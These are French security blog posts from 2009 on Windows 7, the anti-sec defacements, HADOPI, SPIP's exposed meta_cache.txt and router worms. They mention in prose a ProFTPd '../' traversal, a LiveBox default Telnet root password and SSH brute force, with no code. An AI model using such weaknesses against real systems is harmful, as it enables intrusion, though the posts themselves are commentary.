Le système est disponible depuis le 7 août pour les abonnés MSDN/Technet+. Il était même "dans la nature" quelques jours avant suite à une fuite (il ne serait probablement pas illégal vous donner le lien, vu que c'est la clé de licence qui contrôle tout, mais n'étant pas juriste je préfère m'abstenir :).

Il est clair que la première impression est plutôt bonne: pas d'écrans bleus, système fluide sur du matériel d'il y a 2/3 ans, bonne ergonomie (moins de prompts UAC, barre des tâches retravaillée), ... Il faut dire que depuis novembre 2006 (sortie de Vista sur MSDN), les constructeurs ont eu le temps de peaufiner leurs drivers.

L'objectif de ce billet est surtout de mettre l'accent sur un choix: soit vous restez sous Windows XP, soit vous passez à Windows Seven. Pour citer la page Wikipedia consacrée à Vista:"Vista est considérée comme l'une des versions les plus calamiteuses de Windows". Et comme le dit un ami risk manager, donc habitué des formules synthétiques: "le monde se souviendra de Windows Vista comme de Windows ME".

Windows Seven offre le noyau et l'habillage graphique de Vista, les bogues en moins, et certaines features en plus: Direct Access (tunnel IPv6 équivalent à un VPN), mode Windows XP (basé sur Virtual PC), etc.

Bien sûr, tout n'a pas été corrigé. Il reste impossible d'importer une photo individuelle depuis un appareil photo numérique sans synchroniser tout le contenu. Il reste donc nécessaire d'avoir un appareil familial et un appareil porn^H^H^Herso (on peut en conclure que les développeurs Microsoft n'ont pas de famille, ou pas de relations sexuelles, au choix :).

Mais aujourd'hui, démarrer une migration vers Vista ne fait plus aucun sens. D'autant que le dernier Service Pack est prévu pour 2010, et la fin de support mainstream pour 2012.

Reste la question de la migration éventuelle vers Linux, comme certains collègues me le rappellent tous les jours.

Malheureusement, outre les arguments traditionnels en défaveur de Linux [*], ce système prend cher en ce moment [1][2][3][4]. Depuis que Google a décidé de s'en servir comme base pour ChromeOS (à moins que ce ne soit le projet SEC&SI qui ait tout déclenché :), ils se rendent compte que tout reste à faire en matière de sécurité, à commencer par sensibiliser le Chef de Patrouille (a.k.a. Linus). Pour paraphraser l'ineffable Dave Aitel: "Right now, Linux kernel security is 5 years behind Windows".

Bien sûr, Thomas Garnier nous avait démontré que le noyau Windows connait les mêmes problèmes. Mais depuis qu'il a été recruté par Microsoft, tout va mieux !

PS. Avec la sortie de Seven (et 2008R2), Microsoft en a profité pour faire le ménage dans son stock de bogues (certains ont plus de 2 ans !). Alors si vous avez dansé tout l'été, patchez maintenant !

[*] impossibilité de gérer de manière centralisée des parcs étendus, incompatibilité des applications professionnelles dominantes, coût de formation des utilisateurs et des exploitants exhorbitant, absence de socle logiciel stable (ex. pilotes graphiques), etc. Laissons le troll en paix :)

Casser du WPA comme l'élite

2009-08-07T08:00:00.000+02:00

Vous avez téléchargé la BackTrack, mais vous n'avez toujours pas réussi à trouver la clé WPA de votre voisin ...

Vous avez appris le CUDA, mais vous n'avez toujours pas réussi à trouver la clé WPA de votre voisin ...

Vous avez appris le VHDL, optimisé le placement/routage de votre Virtex-4 à la main, mais vous n'avez toujours pas réussi à trouver la clé WPA de votre voisin ...

Et pendant ce temps, l'élite du hacking craque une clé WPA en 10 secondes avec 1 seul paquet ... 1 paquet pour trouver l'adresse MAC du client légitime, et une paire de jumelles pour lire la clé du voisin !

(Photo réalisée sans trucage - pour ceux qui n'ont pas l'habitude, il s'agit d'une LiveBox avec son sticker d'origine mentionnant la clé WPA)

Comme quoi HADOPI a du bon: cette loi va opérer une sélection naturelle des gens qui conserveront le droit d'accès à Internet. La qualité globale du réseau ne peut que s'en trouver améliorée !

PS. Pour les esprits chagrins qui lisent ce blog, s'il y en a: je n'utilise pas la connexion WiFi des voisins. D'ailleurs la clé WPA se trouve en dessous de la LiveBox et pas sur le côté :)

La preuve que la sécurité est un échec

2009-07-27T08:00:00.002+02:00

Pour ceux qui ne lisent pas (ou plus) la liste de diffusion Full Disclosure, voici la version courte de l’histoire : un « groupe » se faisant appeler « anti-sec » lance une guerre totale contre les « white hats » (les gentils hackers, si toutefois cela a un sens) et le « full disclosure ». Une telle initiative refait surface de manière périodique, la dernière en date étant le « pr0j3kt m4yh3m » (tout un programme).

Comme preuve de leur motivation, ils ont saccagés quelques sites à forte visibilité : Astalavista, ImageShack … le dernier en date étant la crème du consulting américain en sécurité informatique : la société Matasano.

Cette histoire est emblématique à plusieurs titres.

Tout d’abord la réponse à « pourquoi la sécurité est un échec » se voit une n-ième fois confortée : toutes ces attaques sont basées sur la découverte d’un mot de passe faible par brute-force SSH, n’en déplaise à ceux qui pensaient avoir trouvé un « 0day » exploitable en préauth dans SSH sur un Linux 64 bits avec le patch GrSecurity appliqué …

N’oublions pas le cas de Twitter, qui aurait pu simplement « disparaitre » du Web à la suite de la compromission d’un mot de passe (heureusement que cette attaque était le fruit d’un individu isolé plutôt bien intentionné).

Ensuite le cas de Matasano laisse songeur, surtout lorsqu’on voit que le même système est utilisé pour de l’hébergement Web, de la messagerie … et le stockage de données d’audit client (ex. « ISA Pen Test Availability_13_Feb.xls »).

La sécurité est un échec car personne, quel que soit son niveau de compétences et l’énergie investie dans l’administration de ses systèmes, ne peut prétendre être invulnérable. D’ailleurs vous ne m’entendrez jamais dire « fu^H^Hhack me I’m famous », car je sais trop bien que vous y arriveriez :)

Des exemples ?

On lit dans la presse que divers réseaux de sensibilité extrême sont piratés (DoD, FAA, système de paiement, …). C’est bien sûr totalement invérifiable, mais crédible. Ayant eu l'occasion de m'intéresser à quelques réseaux sensibles vaguement connectés à Internet (SITA, réseaux satellitaires, etc.), il s’avère qu’ils sont tous de même niveau de sécurité que le réseau bureautique moyen … l’expérience des attaques en moins !

Prenons quelques exemples publics et vérifiables :

Le site « j’aime les artistes ». Un(e) ministre ayant commis l’erreur de prétendre ce site inviolable, il a été immédiatement mis hors d’usage.
La société « Extelia ». Après avoir gagné l’appel d’offres HADOPI, cette société et tous ses sites clients ont immédiatement été piratés.
Le (défunt) Challenge Securitech. Bien sûr faire converger tous les « experts en sécurité » français (soyons clair, Securitech était devenu très « corporate » sur la fin :) sur un site où ils peuvent gagner un iPod en piratant était dangereux. Mais se faire avoir parce que l’hébergeur a désactivé l’option « magic quotes » est un peu humiliant quand même :)
Le blog d’Ivanlef0u. En même temps, je ne vois pas qui peut assurer la sécurité d’un hébergement mutualisé en PHP. Ils serait plus facile de compiler OpenOffice sous OpenBSD.
Edit: n'oublions pas la fameuse démo du projet SPAClik au SSTIC'09. "Aucune faille n'a été trouvée dans mon système jusqu'à présent". On connait la suite, avec l'humiliation en direct sur scène.

Quel est le point commun entre tous ces cas ? La dépendance du niveau de sécurité global à celui des tierces parties impliquées.

Ainsi dans mon cas, je suis dépendant de :

La sécurité de ma Freebox (autant dire pas grand-chose, puisqu’elle est administrable à distance par au moins tout le personnel de Free).
La sécurité de mes fournisseurs de messagerie (Free, Gmail, etc.). Autant dire pas grand-chose non plus, même si j’utilise de fausses réponses aux questions secrètes, que je ne lis jamais mon mail via l’interface Web, et que j’utilise un mot de passe différent sur chaque site. Car réaliser un Webmail sécurisé relève de la mission impossible.
La sécurité de mes machines à la maison. Ainsi « on » m’a fait remarquer que dans la configuration Debian par défaut du serveur ProFTDd, l’utilisateur anonyme peut accéder à tout le disque par un simple « ../ ». Mais qui fait encore confiance à Debian pour assurer sa sécurité ? :)

Alors que peut-on faire ? Rien du tout, car en général il suffit que l’un de ces maillons soit brisé pour que le château de cartes s’écroule par le jeu des relations de confiance. La meilleure défense consiste à ne rien stocker de sensible qui ne soit accessible en ligne, car tout ce qui est connecté à Internet est ou peut être compromis.

Pour tenter une analogie (avec tous les risques que cela comporte), les digicodes ne servent à rien quelle que soit la longueur du code - à partir du moment où au moins un résident de l'immeuble a déjà commandé une pizza par téléphone (disclaimer: je n'ai jamais audité le réseau Pizza Hut, je suppose juste que tous les digicodes sont stockés en clair dans leur base de données :).

Alors quand on voit le nombre d'intermédiaires impliqués dans la gestion du réseau Internet en France, on peut se poser des questions sur la sécurité même de nos infrastructures critiques ...

(Que serait un billet polémique qui ne se termine pas sur impots.gouv.fr ? ;)

Edit: je n'avais pas vu que le magazine Capital était arrivé exactement à la même conclusion ! Promis je n'étais pas au courant ...

Psychose

2009-07-24T08:00:00.002+02:00

Pour commencer, il vous faut écouter cette séquence avec attention (il s'agit d'un distributeur de billets de marque Diebold situé à Paris, strictement identique à tous les distributeurs déployés par la Société Générale en France):

Si vous êtes utilisateur Windows, vous aurez reconnu sans peine le son "chimes" (C:\Windows\Media\chimes.wav) émis par ce distributeur (par dessus le bruit ambiant, désolé pour la piètre qualité de l'enregistrement).

Que viennent faire ici ces sons assez saugrenus, à part nous signaler que le distributeur tourne probablement sous une version quelconque de Windows Embedded (ou que la licence Microsoft a été violée) ?

A la lecture de l'article "organiser la fuite d'information d'un poste isolé: méthodes logicielles" - et particulièrement du chapitre "attaque via le jingle Windows" (MISC n°44, entièrement lisible en ligne à cette adresse), un doute horrible me saisit: et si ces sons servaient de stégo-medium à mon code PIN ?

Depuis, je ne vais plus retirer de l'argent sans chanter à tue-tête quelque musique nordique conseillée par Ivanlef0u. En l'état actuel des connaissances, aucun algorithme de traitement du signal ne peut extraire d'information utile dans ce bruit blanc.

L'échec de la sécurité française

2009-07-03T08:00:00.001+02:00

Ou pourquoi il faut arrêter de me saouler avec les "0day" ...

Les français ne manquent pas de talent dans le domaine de la sécurité informatique. Malheureusement ils ne s'épanouissent pas forcément dans leur pays d'origine. Parmi les gens que j'ai connu personnellement et qui sont partis, on peut citer:

Kostya Kortchinsky

D'abord CERT Renater, puis EADS, et maintenant Immunity (à Miami). Il s'est illustré par l'exploitation de la faille MS08-001 (qualifiée d'impossible par Microsoft) et l'évasion de VMWare (attaque CloudBurst).

Nicolas Pouvesle

Anciennement Tenable Network Security (n'oublions pas que Nessus est un produit français à l'origine), cité par H.D. Moore comme "Top Influencer", contributeur du projet Metasploit, auteur du plugin PatchDiff2 pour IDA Pro ... et maintenant chez Immunity également.

Thomas Garnier

Anciennement SkyRecon (un autre produit français), auteur de failles innombrables dans le composant GDI de Windows, il est parti chez Microsoft Corp. lors de la reprise en main de SkyRecon.

Julien Tinnès

Anciennement FT R&D, il est parti (comme beaucoup d'autres) chez Google lorsque cette entité a été rattachée au marketing sous le nom d'Orange Labs. Il s'est illustré récemment sur la faille Java util.calendar(), mais tourne en fait dans le milieu depuis longtemps.

Julien Vanègue

Chef de file du projet ERESI, il a fini par virer sa cuti et rejoindre l'équipe MSEC de Microsoft.

Bien sûr, il existe encore probablement beaucoup de gens de qualité dans l'underground et l'upperground français. Mais quand je lis que la mise en oeuvre de la LOPPSI va peut-être nécessiter des "0day" pour installer les mouchards à distance, je manque de m'étouffer.

Non seulement la plupart des gens ayant démontré publiquement une certaine capacité dans le domaine sont partis, mais de plus tous les programmes publics d'acquisition de "0day" sont étrangers (américains en fait, sauf feu-WabiSabiLabi).

Si c'est pour faire appel à des projets universitaires, et sans mauvais esprit aucun (je ne suis pas connu pour ça :), on aura peut-être un fuzzer pour les syscalls NT4 dans 3 ans après avoir usé 5 thésards ...

Si c'est pour mettre le flingue sur la table ou la tête dans le caniveau, ça ne marche pas: il est impossible pour un magicien de créer un objet magique sous la contrainte.

Alors bien sûr, quelques initiatives sortent du lot, comme la conférence iAWACS: international Alternative Workshop on Aggressive Computing and Security - The No Limit Workshop, selon leurs termes.

On pourrait imaginer un programme particulièrement alléchant, comme:

Remote Root sur les LiveBox (ne rigolez pas, ça a existé)
VIGIK: comment ouvrir toutes les serrures avec une clé privée
Sécurité du pass Navigo (sur le modèle de Mobib Extractor)
Sécurité du site des impôts (ou comment économiser de l'argent en supprimant les certificats)
La backdoor dans SecurityBox (pudiquement appelée "clé de recouvrement/séquestre" dans l'étude publiée par HSC)
Etc.

Mais j'ai vaguement l'impression que le résultat final sera un peu moins sexy ... Espérons que les meilleures soumissions se verront exploitées sans passer par la case "publication" !

Pour finir, je campe sur ma position qui a toujours été claire depuis le début: les "0day" ne servent à rien (dans 99,9% des cas, je mets de côté le cas des systèmes vraiment protégés).

Ainsi le dernier numéro (n° 4/2009) du magazine Hakin9 m'est arrivé en anglais. Erreur de routage ou disparition de la version française ? Peu importe, la version anglaise est finalement comparable à la version française: les articles sont extrêmement inégaux en qualité (sur le fond et sur la forme).

Et là, un certain Carsten Köhler (visiblement très actif par ailleurs) nous délivre ses tricks de pentesteur, et explique par exemple qu'il est possible de créer des fichiers arbitraires sur n'importe quel système Windows qui partage au moins une imprimante.

Je reviendrai plus tard sur les détails techniques, mais voilà exactement le genre d'astuce qui marche "pour de vrai": une faille de conception (donc très difficile à corriger), multi-versions, multi-langues, ne risquant pas de planter le système distant, exploitable via les API Windows. Rien à voir avec un "0day" au sens où on l'entend d'habitude !

IKEArt

2009-06-29T16:38:00.002+02:00

Je suis en vacances en ce moment, ce qui explique que je ne blogue pas (et que je ne suis pas à Hacker Space Festival). Mais ne vous inquiétez pas, j'ai toujours des choses à dire !

En attendant, voici un peu d'IKEArt (j'étais assez fier de moi sur le coup :)

Spam fail

2009-05-27T22:20:00.000+02:00

Je ne prends plus la peine de commenter la créativité et la diversité des messages commerciaux non sollicités (spam) que je reçois, par manque de temps pour bloguer. Mais c'est souvent un plaisir que de parcourir la boite à spam en début de matinée, tout en sirotant 1L de café lyophilisé (je reçois environ 800 spams par jour).

Pour ceux qui ne connaissent pas le client de messagerie Outlook, sachez que Word est l'éditeur de courier par défaut (s'il est installé). Ce qui offre des possibilités intéressantes, comme une correction orthographique et grammaticale de qualité.

Mais Word dispose de bien d'autres fonctions. C'est ainsi que j'ai récemment reçu un spam dans lequel ... le mode "révision" était activé ! Ce qui permet de connaitre toutes les modifications antérieures du message.

Spam fail.

Allez, pour la route, voici une capture d'écran du message s'affichant sur le Hotspot WiFi de la Cité des Sciences il y a quelques mois (merci Arno pour cette perle).

Un avis d'expert sur HADOPI

2009-05-22T21:08:00.002+02:00

Déjà être expert ça n'est pas grand chose - après tout il y en a environ 325 millions d'après Google. Pas comme les Senior Experts, les Executive Experts ou les Technical Evangelists :)

Ensuite le débat est clos, puisque la loi a été votée. L'avenir est à la LOPPSI 2 (avec deux 'P', puisque cela signifie Loi d'Orientation et de Programmation Pour la Sécurité Intérieure).

Enfin je n'ai pas lu le texte de loi, car le juridique est un domaine rébarbatif au possible pour les non-juristes (sauf ceux qui aiment à placer quelque locution latine au milieu d'un slide PowerPoint, mais ils se font rares).

Mais comme les trolls restent nombreux et poilus en cette saison, essayons de réfléchir 5 minutes aux moyens techniques d'empêcher le téléchargement d'oeuvres dites "protégées" (essentiellement films et musiques) - dont l'objet est par ailleurs d'être diffusées le plus largement possible.

Le texte de loi semble orienté à l'encontre du téléchargement. C'est une méthode comme une autre, car dans les années 80 circulaient déjà dans les cours de récréation disquettes Atari ou Amiga. Dans les années 90 ce furent les "LAN parties" qui favorisaient les échanges, puis au début des années 2000 il n'était pas rare de voir circuler pochettes ou spindles de CD dans les soirées. Depuis, tout le monde s'est converti au disque externe de 1 To (ou plus). Une taxe a d'ailleurs été votée en son temps sur les supports de stockage. L'échange via Internet avec des inconnus est certes plus pratique, mais finalement moins socialisant ...

Notons que le "téléchargement" reste une notion assez vague, le peer-to-peer (P2P) ne représentant qu'une partie de l'iceberg composé du streaming, des newsgroups, du téléchargement direct (ex. RapidShare) parfois payant, voire du piratage de iTunes par des chinois.

Il serait donc techniquement nécessaire de contrôler tous les usages d'Internet. Pour cela, il existe 3 solutions (non mutuellement exclusives):

Contrôler le serveur source (par exemple, mettre en place un faux serveur eDonkey). Cette solution - pratiquée par des sociétés comme MediaSentry - est légalement douteuse et ne passe pas à l'échelle, vu la prolifération de l'offre.
Contrôler le réseau. Une solution très alléchante, mais qui présente deux inconvénients: elle ne supporte pas la cryptographie ; et elle nécessite une infrastructure technique de filtrage et de journalisation (à valeur probante) considérable, pour laquelle ni l'Etat ni les FAI ne sont prêts à payer.
Contrôler le client final. Cette solution résout les deux problèmes précédents. C'est un peu le Cloud Computing appliqué à la cyber-surveillance :)

La solution #2 est moins coûteuse à mettre en place si le système de contrôle est implanté directement dans la fameuse "box" Triple-Play que fournissent tous les FAI français. Et quoi qu'en dise Rani, peu de gens la remplacent par un modem standard, sous peine de perdre la téléphonie et la télévision. Ce dernier point est d'ailleurs assez surprenant, car il serait assez simple de prendre une carte ATM et d'y ajouter les couches logicielles "qui vont bien" (SIP, etc.) pour récupérer la fonctionnalité Triple-Play. Ou de modifier une box existante pour y intégrer un firmware libre.

Mais la solution #2 est globalement inapplicable, car si elle se sait, tout le monde installera son modem ADSL de secours "spécial téléchargements".

La solution #3 est celle qui semble explorée par HADOPI. Elle présente de nombreux défis techniques qui me semblent impossibles à relever en l'état actuel.

Le système de contrôle peut être logiciel ou matériel. Cette dernière solution n'est pas totalement aberrante techniquement, puisque des constructeurs intègrent déjà des solutions comme CompuTrace, ou un deuxième système d'exploitation virtualisé, dans leur BIOS. Mais elle imposerait d'acheter un matériel agréé par l'Etat pour accéder à Internet, ce qui est délicat du point de vue de la concurrence ... sauf si les spécifications sont publiques et largement implémentées, ce qui ne va pas se faire en un jour (et probablement jamais).

Et puis en 2009, on voit mal l'Etat distribuer un PC à chaque foyer comme on a pu distribuer des Minitel :) - d'autant qu'il n'existe plus aucun constructeur de matériel français.

Enfin rien ne saurait empêcher un français d'acheter son matériel n'importe où dans la communauté européenne. Il faut donc partir du principe que le matériel connecté n'est pas maitrisé.

Une solution intermédiaire serait de disposer d'un matériel additionnel permettant le contrôle des usages sur tout PC standard. Pourquoi ne pas envisager un crypto-processeur intégré à la future carte d'identité électronique par exemple ? Les coréens (du Sud) le font bien pour poster des commentaires sur YouTube (chacun ses problèmes). On peut aussi distribuer un Globull à chaque français, pour faire travailler l'industrie nationale :)

Notons que le problème de l'authentification ne se pose pas vraiment, puisque le titulaire de la ligne est réputé responsable de toute activité Internet depuis celle-ci, sauf s'il apporte une preuve contraire. Il n'est donc pas nécessaire de déployer du 802.1x avec authentification par carte d'identité à l'échelle de l'Internet français :)

En ce qui concerne l'idée d'un mouchard logiciel, elle est vouée à l'échec pour plein de raisons, dont les principales sont: compatibilité et sécurité.

Tout d'abord des cris d'orfraie ont été entendus du côté de l'Open Source lorsqu'il a été question de fournir un mouchard compatible avec Windows uniquement. Mais il s'agit d'un combat d'arrière-garde, car le système qui va dépasser le PC sous Windows en terme d'unités connectées à Internet c'est ... le téléphone portable !

Et là, entre Symbian, Windows Mobile, BlackBerry, Android et l'iPhone, cela devient un casse-tête logiciel, d'autant que la plupart de ces plate-formes sont "fermées" aux développements "bas niveau" principalement pour des raisons de ... DRM (notez l'ironie de la situation).

Ensuite d'un point de vue de la sécurité, l'idée d'un mouchard logiciel laisse rêveur. L'industrie informatique grand public ces 20 dernières années est partie de systèmes non sûrs pour les rendre non sécurisables. En gros, la sécurité est un échec.

Parmi les catastrophes qui pourraient advenir à ce mouchard logiciel, on peut citer le fait que sa sécurité soient contournée (ce qui lui enlèverait toute valeur probante), qu'il soit victime de bogues logiciels mettant en danger la machine sur laquelle il est installée (ça s'est déjà vu avec les antivirus), voire qu'il soit détourné de sa fonction première (le rootkit Sony, ça vous rappelle quelquechose ?).

Et malgré tous les efforts de développement et de certification possibles (que ce soit CSPN ou EAL), le WDK n'est pas écrit en ADA.

La catastrophe majeure serait que le backoffice de l'infrastructure soit compromis. C'est presque ce qui est arrivé au gouvernement australien, qui avait mis en place un filtrage du Web.

L'informatique de confiance est une idée poursuivie par Microsoft depuis longtemps avec le projet Palladium. Bien que Microsoft soit probablement l'acteur le mieux placé pour influencer la sécurité de l'informatique personnelle, une thread récente sur la liste Daily Dave démontre encore que la bataille est loin d'être gagnée, et pas seulement pour des raisons techniques.

Microsoft est effectivement en position idéale pour rendre les services de filtrage attendus sur son propre système, entre Windows Defender (qui pourrait bloquer tout logiciel de téléchargement grand public) et les listes noires intégrées au navigateur Internet Explorer 8. Mais pour des raisons d'image évidentes, je vois mal Microsoft activer une telle infrastructure au service du gouvernement français ...

Enfin se pose anecdotiquement le problème du point de connexion. Je ne parle pas des cyber-cafés, car il est facile de les fermer administrativement, ou de leur imposer un système d'accès à Internet comme en Chine.

Je parle de toutes les connexions qui ne sont pas de l'ADSL opéré par un FAI français. Cela inclut les abonnés AOL (dont les proxies Web ne sont pas en France), les utilisateurs de 3G+ (et bientôt 4G) d'un opérateur étranger en roaming, les utilisateurs du service FON ou Neuf WiFi, voire d'un futur mesh network WiMAX reprenant le concept de feu Paris Sans Fil.

Voilà, je ne doute pas que les commentaires seront nombreux, mais tant qu'ils restent courtois et avisés je suis preneur :)

Rien n'est laissé au hasard

2009-04-07T21:10:00.002+02:00

Ceux qui m'ont déjà lu ou entendu savent que je ne manque jamais une occasion de dire que "PHP est la pire régression pour la sécurité depuis 10 ans"(tm).

Or un incident de sécurité est récemment survenu sur une installation de SPIP dans un laboratoire du CNRS. Cet incident, fort bien analysé dans la newsletter "Sécurité de l'Information", pourrait en rester au stade de l'anecdote. Mais à y regarder de plus près, il s'agit d'un exemple flagrant qui vient habilement illustrer cette thèse.

Car le problème vient tout simplement du fait que SPIP gère l'intégralité de sa configuration et des données de session dans un fichier texte à plat, accessible depuis la racine du serveur Web. On peut supposer que ce choix a été contraint techniquement par le manque de fonctionnalités des premières versions de l'interpréteur PHP ... je n'ose croire qu'il puisse s'agir d'un choix conscient et délibéré de la part des développeurs.

Le fichier en question s'appelle meta_cache.txt. Il est normalement protégé par un .htaccess, qui pour plein de bonnes et de mauvaises raisons ne fait évidemment pas toujours son office, comme une rapide recherche Google permet de s'en rendre compte.

Ce fichier contient une variable nommée alea_ephemere qui s'avère essentielle pour la sécurité des opérations sur le site (les détails sont dans la newsletter susmentionnée).

Accessoirement, ce fichier contient également une variable au nom intriguant: secret_du_site.

Une rapide recherche documentaire permet d'approcher (sans toutefois le comprendre) le rôle de cette variable:

A la lecture de cette documentation, la première chose qui me vient en tête c'est cette merveille du 7ème art ...

PS. De source orale, SPIP émule également le mécanisme bien connu des register_globals afin de contourner les configurations PHP un peu trop sécurisées.

Futurologie

2009-03-28T22:49:00.003+01:00

En 2006, j'avais imaginé que les protocoles P2P puissent être utilisés comme canal de contrôle résilient par des botnets.

A l'époque, les bots rencontrés dans la nature utilisaient uniquement des connexions HTTP ou IRC vers un serveur statique comme canal de contrôle. Peu de temps après apparaissait le ver Nugache, présenté comme révolutionnaire car basé sur un protocole P2P.

Cette même année 2006, j'avais présenté les risques liés à la monoculture dans le domaine des boxes ADSL (ça ne s'est pas amélioré depuis, avec la concentration du secteur), leurs faiblesses de conception et d'implémentation. Avec une démo live (pour ceux qui s'en souviennent) d'insécurité flagrante liée aux interfaces d'administration exposées sur Internet. Pour planter le décor, la Livebox a pendant longtemps exposé sur Internet un serveur Telnet (sur un port non standard), et le mot de passe root était 1234.

Il semble qu'en 2009, un ver se propage sur des routeurs grand public (Linksys, etc.) dans cette configuration.

Bien sûr je ne peux pas me targuer d'avoir inventé le proxy Web (private joke, désolé), mais voilà qui fait tout de même du bien à l'égo (et un blog est fait pour ça :).

Cette année je m'apprête à prédire que la sécurité informatique va dans le mur à court ou moyen terme ... Je ne pense pas trop me tromper :)

Maintenant la véritable information.

Dans cette analyse du ver susmentionné, on peut lire:

La Freebox est invulnérable face à cette attaque. Selon Free, il n’y a "aucune chance." ;)

On peut lire par ailleurs que la Freebox vient d'ajouter le support du protocole UPnP. Pour résumer l'historique de ce protocole:

Failles d'implémentation dans la plupart des modems/routeurs du marché [1] [2] [3]
Librairie Open Source non maintenue depuis 2006 (encore utilisée dans de nombreux modems/routeurs du marché).
Nouvelle librairie Open Source présentant un historique loin d'être vierge (notez le subtil "Bugfix for M-Search packet" tout en bas).

Ready ... set ... go !

Les gens ne lisent plus (ils jackent)

2009-03-07T23:00:00.001+01:00

J'ai découvert par hasard qu'il existait des rétroliens sur ce blog, malgré ma modeste 842,000ème place sur Technorati !

Parmi ceux-ci, un article sur les blogs du site LeMonde.fr (rien que ça !). Et bien figurez-vous que cela m'a apporté 60 visiteurs le jour de la publication, 30 le lendemain, et c'est tout. Ce qui est à peine visible sur le graphe Google Analytics:

Alors qu'une citation sur la liste "Daily Dave", c'est du lourd ! (Environ x3 en audience sur la journée).

Parmi les rétroliens que j'ai découvert avec curiosité:

Le visiteur qui s'est perdu ici en utilisant Ethicle, le moteur de recherche qui plante des arbres ...
Le site Niouzes, qui syndique le newsgroup "comp.os.linux" (trollomètre au taquet). J'ai le privilège d'y être cité au moins 2 fois [1][2]. Là où ça devient fort, c'est que la référence à ma bâche sur \LaTeX ... est illisible à cause de l'encodage utilisé sur le site (UTF-8 probablement ;).
Enfin, le meilleur d'entre tous, le site de Jacques, alias *Jack. Mythique.

Petit conseil à l'auteur: une recherche Google sur "*jacking" devrait être une source inépuisable d'inspiration: Ad-Jacking, WiFi-Jacking (à ne pas confondre avec le Wiki-Jacking), Call-Jacking, Side-Jacking, ... on a même eu droit au Lang-Jacking et au Chirac-Jacking, un moment :)

(Ok, je sors).

Random Rants Against Microsoft

2009-02-13T18:00:00.000+01:00

NoDriveTypeAutorun

Pour commencer, je pense qu'il n'a échappé à personne que le ver Conficker utilise (entre autres) la fonction Autorun de Windows (ainsi que la fonction Autoplay - qui n'est pas du tout la même chose) pour se propager.

Et là, nouvel échec de l'industrie de la sécurité: l'US-CERT signale que la clé NoDriveTypeAutorun, mentionnée dans tous les guides de sécurisation Windows depuis plusieurs années, est grosso modo sans effet. Ce qui signifie qu'aucun des auteurs de ces guides de sécurisation n'a testé sa recommandation sur sa propre machine ...

Un patch est disponible sur le site de Microsoft, mais il doit être installé manuellement par l'utilisateur (pas de Windows Update). Et ce patch a été poussé silencieusement dans Windows Vista et 2008 avec MS08-038.

Double fail.

Windows Mobile

J'ai eu l'occasion de récupérer un téléphone sous Windows Mobile 6.1 (passons sur les détails).

Je l'ai prêté à ma femme, car elle pense à abandonner son vieux Sony Ericsson K750i pour un téléphone plus "moderne".

La première chose qu'elle a voulu faire, c'est changer le fond d'écran. Après plus de 10 minutes de recherche infructueuse, j'ai fini par lui expliquer que c'était dans :

Menu Démarrer > Paramètres > Personnel > Aujourd'hui > Image d'arrière plan

Et que non, le menu "parcourir" ne permet pas d'avoir un aperçu des images.

Ergonomy fail.

Versioning et marketing

C'est officiel depuis plusieurs jours, la Beta1 de Windows Seven est disponible.

Il faut savoir que Windows "Seven" a pour numéro de version interne ... 6.1

Et que la mise à jour Vista vers Seven sera a priori gratuite.

Vista fail ?

PS. Pour Internet Explorer, la gestion des versions est encore pire - puisqu'à peu près toutes les versions de navigateur s'installent sur toutes les versions supportées de Windows (XP / Vista / Seven). Alors si vous voulez comprendre comment ça marche, rendez-vous sur le blog Internet Explorer.

GDR vs. QFE

"On" vient de me signaler la différence subtile entre General Distribution Release (GDR) et Quick Fix Engineering (QFE).

La première contient des correctifs et des fonctionnalités supplémentaires (par exemple NAP, apparu dans Windows XP SP3), tandis que la deuxième ne contient que les correctifs.

Le mode QFE peut être forcé à l'installation d'un Service Pack en passant le paramètre /B.

On en apprend tous les jours (je n'ose pas dire expertise fail :).

Les TechDays

Je me garderai de faire un compte-tendu exhaustif des Microsoft TechDays édition 2009, car je suis sûr que d'autres sont déjà sur la brèche. Mes impressions à chaud:

Les speakers Microsoft donnent en général l'impression de découvrir les slides (fraichement traduits de l'anglais) à l'écran.
Pas un mot sur Vista cette année ! Comme dirait un collègue, "dans 10 ans on le confondra avec Windows ME".
Et surtout ... goodies fail cette année :(

Ca reste quand même à voir pour plusieurs raisons:

C'est gratuit et bien situé.
Tout le monde y est.
On peut jouer avec la table Surface (j'ai hâte d'avoir ça dans mon salon).
C'est un mélange improbable entre geeks boutonneux (souvent étudiants) et hôtesses comme on en voit pas dans les salons Open Source.

Ceci dit, dans la "vraie vie" (i.e. les entreprises), je rencontre plus souvent des gens bloqués avec des macros VBA sous Word 97 ou des applications Visual Basic 6.0, que des passionnés qui se documentent sur les nouveautés du Framework .NET 4.0 ou Windows Presentation Foundation ...

L'Underground

Parmi les conférences concurrentes des TechDays, il y avait le colloque de l'EPITECH.

Et quand je vois le programme, je me demande ce que signifie underground exactement ...

11h : Table ronde
* Général Yves Mathian, ancien Directeur Technique de la DGSE
* Commandant Nicolas Duvinage, Chef d'escadron
(...)
15h30 : Conférence underground : "Vulnérabilités et exploitations avancées"

Dell Mini & Ubuntu, fail too

2009-02-09T08:00:00.000+01:00

Je croyais avoir fait une bonne affaire au Champion en me procurant un Dell Mini (9" de diagonale, 8 Go de disque SSD) pour 149 euros. Mais c'était sans compter sur Ubuntu 8.04 (préinstallé en usine) ...

Clairement, la machine a deux énormes avantages sur l'Asus EEE 701:

Un vrai processeur (Intel Atom) qui permet de faire tourner correctement des applications comme gcc (indispensable sous Linux si j'ai bien compris).
Une vraie distribution récente, qui permet d'installer presque toutes les applications Open Source par un simple apt-get.

Maintenant à l'usage on touche également assez rapidement les limites:

Le clavier est difficile d'utilisation, surtout avec sa touche M plus petite que les autres (on sent qu'il a manqué 1/2 cm ...).
La sortie de veille (suspend to RAM) est erratique. Il vaut mieux ne rien laisser ouvert avant de fermer le capot.
Lors de la sortie de veille, le clavier est toujours en QWERTY. Il faut éditer xorg.conf pour changer le layout par défaut.
La veille prolongée (suspend to disk) n'est tout simplement pas supportée "de base".
Le gestionnaire de paquets fait quelques blagues (pour information, le dépôt de paquets ne semble pas être un dépôt Ubuntu "officiel"):

Mais surtout, je viens de toucher la plus grosse limite du système: le driver de la carte WiFi (une Broadcom bcm4312) ne supporte pas le mode monitor !

Confronté à la question, les experts du domaine ont répondu (comme je m'y attendais un peu): "il faut recompiler un noyau plus récent".

Je leur ai répondu d'aller recompiler un WRK, et sur ce je considère le passage à Mac OS X !

E4300 & Vista64, suite

2009-02-05T08:00:00.000+01:00

Mes aventures avec le Dell E4300 sous Vista64 continuent ... et c'est encore un fail multiple !

